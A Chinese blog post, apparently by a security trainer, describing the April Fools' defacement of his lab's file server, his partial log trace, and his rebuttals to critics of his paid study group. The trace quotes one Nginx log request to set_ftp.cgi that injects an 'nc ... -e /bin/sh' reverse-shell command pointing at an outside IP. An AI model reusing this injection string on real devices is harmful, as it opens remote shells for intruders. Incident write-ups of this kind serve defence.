管理我的频道

有一只白色猫咪跑到了我的窗前(结尾抽奖)

0x00前言:


3月31日,录制完第一天的课程后,晚上和朋友出去吃了个饭,缓解一下最近的压力


坐地铁回到家已经是晚上10点钟了,但在窗前有一只可爱的小猫咪,跑到了我的窗前:


看着他好可爱的样子,忍不住拿了些牛肉丸子和鸡肉丸子,放在了窗外面,希望能管它一顿饱饭。


随后就去撸代码修靶场去了...


0x01清晨:


一阵微信提示音把我吵醒了,几个朋友找到我说,老哥,你网盘被黑了!


于是我看到很多人给我发这个截屏:


我一看,这都黑?好吧,先不管别的,先处理问题,溯源看看是谁做的


网盘服务器上没有任何防护措施,本来也没想装,有的WAF会把一些攻击的EXP自动删掉,没必要多此一举,结果还是出问题了...


0x02潦草的溯源应急:


靶场


先关停服务器服务,设置白名单连接


简单的找了一下,找到了留下的后门


搜了一下,发现是腾讯云


当试图反打的时候,发现主机关机了,跑的快...


于是尝试从windows日志寻找线索,很可惜,来晚了,已经被清掉了:


于是在大佬的提示下,从Nginx日志入手(不过也被清掉了一部分):


第一次访问黑页的IP是:183.66.151.14


黑页被创建的时间为:4月1日,9:45


顺着时间往上看,发现一条试图nc的操作记录,不过IP是来自美国,这个时候应该拿VPS来了






/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+209.141.56.59+1245+-e+%2Fbin%2Fsh%29 HTTP/1.1" 400 150 "-" "-推特账号也是刚注册不久,没有任何可用的资源...


服务器之前也没装任何防护,纯裸奔,没有其他日志记录了...


跑的挺快,到此为止没有发现其他有价值的东西了,因为时间原因,先到此告一段落...


0x03后续反思:


因为提早早就备份好了备份,所以恢复速度会很快,今天晚上就可以重新使用,对于此次事件,我把他看作有人在愚人节这天对我开了一个玩笑,毕竟服务器上裸机奔跑给大家,我相信还没有人能睿智到这个地步,但是还是有些奇葩的人去做了,这块还是你强!


对于提到的觉得割韭菜一事,我笑而不语...


在很早之前写的一篇文章已经写了


到现在为止,星球人数大概一百四十余人,而且大多数是学生和GA,实际总收费不到2W(很多都是学生打折,对特殊人员只收个200红包)


说我割韭菜的,可以继续用你那“巨婴”小脑袋继续思考


也可以继续站在你的道德制高点继续


反正我收费了,我就变成割韭菜得了,我不对了,我应该做公益


另外说一句,我们高校合作都是不收费的,免费公益,设立这道门槛只是为了防住网络上的这些白嫖的“巨婴”


当然其实也不排除这次攻击事件是因为断了某些人的财路吧


更有无脑的直接在公众号后台开骂:


中国话看不懂的:


还有各种嘲讽的:


一一回应:


原靶场仅为PHP文件上传漏洞靶场,只有20余道关卡,再次基础上继续提升到了三十余个关卡(睁大你的眼睛看明白了,靶场支持ASP文件上传漏洞,JSP文件上传漏洞,ASPX上传漏洞,常见中间件解析漏洞!靶场也会开源!担心以后嫖不到嘛?)


再说喷我拿易语言写工具,请问, 请您对着C#,JAVA,Python得代码分析功能,分析EXP利用方式,或者在没有源代码得基础上分析功能仿写,啥时候语言优越感你也用上了?


对比一下两款语言在写小工具的省劲程度上:


(GUI)


每个语言都有自己得优势,写小工具上面,易语言作为一款已经很久很久没有更新过得编程语言来说,已经做的很棒了,何况,自己那个方便就用那个,难道又要回到那个,什么是世界上最好的语言了?


不好意思,我觉得易语言是世界上最好的中文语言,哈哈哈哈


我也可以拿JAVA写,也可以拿Python去写,你的优越感是不是一点一点得消失了?


好了,还是你的level高,我比不起,我怎么比,没得比啊~


原地向你拜师,你收徒吗?你教我做事吧~


直接我梦回2016啊!


0x04 结尾:


公众号回复:开普勒被黑啦,愚人节快乐

原文连结六度声明DMCA 政策

相关新闻

猜你喜欢

焦点新闻

全部留言 0